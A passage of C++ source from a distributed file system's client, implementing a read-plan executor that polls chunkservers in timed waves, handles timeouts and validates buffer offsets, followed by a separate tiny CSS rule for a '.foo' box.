params.connector.endUsingConnection(poll_fd.fd, server);
available_parts_.push_back(executor.chunkType());
executors_.erase(poll_fd.fd);
}
return true;
}
/*! \brief Execute read operation (without post-process). */
void ReadPlanExecutor::executeReadOperations(ExecuteParams ¶ms) {
assert(!plan_->read_operations.empty());
int failed_reads;
int wave = 0;
// start reads for first wave (index 0)
failed_reads = startReadsForWave(params, wave);
startPrefetchForWave(params, wave + 1);
assert((executors_.size() + networking_failures_.size()) > 0);
// Receive responses
LOG_AVG_TILL_END_OF_SCOPE0("ReadPlanExecutor::executeReadOperations#recv");
Timeout wave_timeout(std::chrono::milliseconds(params.wave_timeout));
std::vector<pollfd> poll_fds;
while (true) {
if (params.total_timeout.expired()) {
if (!executors_.empty()) {
NetworkAddress offender = executors_.begin()->second.server();
throw RecoverableReadException("Chunkserver communication timed out: " +
offender.toString());
}
throw RecoverableReadException("Chunkservers communication timed out");
}
if (wave_timeout.expired() || failed_reads) {
// start next wave
executions_with_additional_operations_ += wave == 0;
++wave;
wave_timeout.reset();
failed_reads = startReadsForWave(params, wave);
startPrefetchForWave(params, wave + 1);
}
if (!waitForData(params, wave_timeout, poll_fds)) {
// EINTR occurred - we need to restart poll
continue;
}
if (poll_fds.empty()) {
// no more executors available, so it is best to start next wave
assert(plan_->isFinishingPossible(networking_failures_));
++failed_reads;
continue;
}
// Process poll's output -- read from chunkservers
for (pollfd &poll_fd : poll_fds) {
if (poll_fd.revents == 0) {
continue;
}
ReadOperationExecutor &executor = executors_.at(poll_fd.fd);
if (!readSomeData(params, poll_fd, executor)) {
++failed_reads;
}
}
// Check if we are finished now
if (plan_->isReadingFinished(available_parts_)) {
executions_finished_by_additional_operations_ += wave > 0;
break;
}
}
}
/*! \brief Debug function for checking if plan is valid. */
void ReadPlanExecutor::checkPlan(uint8_t *buffer_start) {
(void)buffer_start;
#ifndef NDEBUG
for (const auto &type_and_op : plan_->read_operations) {
assert(type_and_op.first.isValid());
const ReadPlan::ReadOperation &op(type_and_op.second);
assert(op.request_offset >= 0 && op.request_size >= 0);
assert((op.request_offset + op.request_size) <= MFSCHUNKSIZE);
assert(op.buffer_offset >= 0 &&
(op.buffer_offset + op.request_size) <= plan_->read_buffer_size);
if (op.request_size <= 0) {
continue;
}
for (const auto &type_and_op2 : plan_->read_operations) {
if (&type_and_op == &type_and_op2) {
continue;
}
const ReadPlan::ReadOperation &op2(type_and_op2.second);
bool overlap = true;
assert(type_and_op.first != type_and_op2.first);
if (op2.request_size <= 0) {
continue;
}
if (op.buffer_offset >= op2.buffer_offset &&
op.buffer_offset < (op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
if ((op.buffer_offset + op.request_size - 1) >= op2.buffer_offset &&
(op.buffer_offset + op.request_size - 1) <
(op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
if (op.buffer_offset < op2.buffer_offset &&
(op.buffer_offset + op.request_size) >= (op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
}
}
int post_size = 0;
for (const auto &post : plan_->postprocess_operations) {
assert(post.first >= 0);
post_size += post.first;
}
plan_->buffer_start = buffer_start;
plan_->buffer_read = buffer_start + plan_->readOffset();
plan_->buffer_end = buffer_start + plan_->fullBufferSize();
assert(plan_->buffer_read >= plan_->buffer_start && plan_->buffer_read < plan_->buffer_end);
assert(plan_->buffer_start < plan_->buffer_end);
#endif
}
void ReadPlanExecutor::executePlan(std::vector<uint8_t> &buffer,
const ChunkTypeLocations &locations, ChunkConnector &connector,
int connect_timeout, int level_timeout,
const Timeout &total_timeout) {
executors_.clear();
networking_failures_.clear();
available_parts_.clear();
++executions_total_;
std::size_t initial_size_of_buffer = buffer.size();
buffer.resize(initial_size_of_buffer + plan_->fullBufferSize());
checkPlan(buffer.data() + initial_size_of_buffer);
ExecuteParams params{buffer.data() + initial_size_of_buffer + plan_->readOffset(), locations,
connector, connect_timeout, level_timeout, total_timeout};
try {
executeReadOperations(params);
int result_size =
plan_->postProcessData(buffer.data() + initial_size_of_buffer, available_parts_);
buffer.resize(initial_size_of_buffer + result_size);
} catch (Exception &) {
for (const auto &fd_and_executor : executors_) {
tcpclose(fd_and_executor.first);
stats_.unregisterReadOperation(fd_and_executor.second.server());
}
buffer.resize(initial_size_of_buffer);
throw;
}
for (const auto &fd_and_executor : executors_) {
tcpclose(fd_and_executor.first);
stats_.unregisterReadOperation(fd_and_executor.second.server());
}
}
| {
"pile_set_name": "Github"
} |
.foo {
background-color: lightblue;
width: 100px;
height: 100px;
}
| {
"pile_set_name": "Github"
} |